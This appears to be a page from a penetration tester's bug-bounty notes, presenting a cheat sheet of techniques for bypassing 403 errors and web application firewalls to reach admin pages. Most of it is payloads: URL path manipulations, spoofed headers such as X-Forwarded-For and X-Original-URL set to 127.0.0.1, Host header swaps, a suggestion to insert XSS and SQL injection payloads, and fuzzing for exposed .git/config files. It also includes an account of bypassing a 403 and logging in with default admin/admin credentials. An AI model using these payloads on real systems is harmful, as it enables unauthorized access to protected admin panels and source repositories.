search

💯WAF or Cloudflare Bypass

hashtag
-------------------------------------------------------------

hashtag
Bypass 403 Error

hashtag
-------------------------------------------------------------

hashtag
Simple Ways to Bypass 403 and Access / Admin

  1. Using Space Symbols

hashtag
website/admin%20

hashtag
website/admin%09

hashtag
website/%2e/path

hashtag
website/admin/.

hashtag
website//admin//

hashtag
website/./admin/..

hashtag
website/;/admin

hashtag
website/.;/admin

hashtag
website/./admin/./

hashtag
website/admin/..;/

hashtag
website/admin..;/

hashtag
website//;//admin

hashtag
-------------------------------------------------------------

  1. Using Traversal tricks:

hashtag
/admin/..;/ /static../admin.json website/admin/api/..;/..;/admin/

hashtag
-------------------------------------------------------------

  1. Using Via Header Bypass:

X-Forwarded-For: Put BXSS and SQLI Payloads

hashtag
X-Custom-Ip-Authorization: 127.0.0.1

hashtag
X-Original-URL: /admin

hashtag
X-Rewrite-URL: /admin

hashtag
X-Real-IP:127.0.0.1

hashtag
X-Forwarded-For: 127.0.0.1

hashtag
X-Custom-IP-Authorization: 127.0.0.1

hashtag
X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1

hashtag
X-Client-IP: 127.0.0.1

hashtag
Content-Type: XML

hashtag
Content-Type: application/XML

hashtag
-------------------------------------------------------------

  1. Using Via HOST Header Bypass:

hashtag
Host: google.com Host: localhost Host: 127.0.0.1 Host: 127.1

hashtag
-------------------------------------------------------------

  1. Using Via Parameter Pulotion Bypass:

hashtag
website/admin/panel ---> 403 website/admin/monitor ---> 200 Then website/admin/monitor/;panel ---> 200

hashtag
-------------------------------------------------------------

  1. Try to Uppercase the alphabet in the URL bypass:

hashtag
website/aDmIN

hashtag
-------------------------------------------------------------

Unicode Text Converter

https://qaz.wtf/u/convert.cgi

hashtag
-------------------------------------------------------------

hashtag
-------------------------------------------------------------

hashtag
403 Bypass

Steps to Reproduce (According to Report):

Navigate to “​https://redacted.com/admin" give (403 error). Then intercept that request with the help of Burp Suite. After intercepting that request simply change the host header value from redacted.com to​​ google.com & hit Go. You will find that the server does not validate that request properly. It simply opens up an admin panel login page. Now Error Changes into 403 Forbidden to 200 OK (Bypassing Done) But now I don’t have the right credentials to get access to the admin panel. Luckily I tried ‘admin’ as a username and ‘admin’ as a password. Got Success.

hashtag
-------------------------------------------------------------

hashtag
Mostly I try Fuzzing and 403 Bypasses

  • Fuzzing /.git/FUZZ (use custom .git wordlist)

  • 403 Bypass /.git => 403

  • /.git/config/ => 200

  • /.git/config/* => 200

PreviousCVE ExploitNextMy Synack Report Methodology

Last updated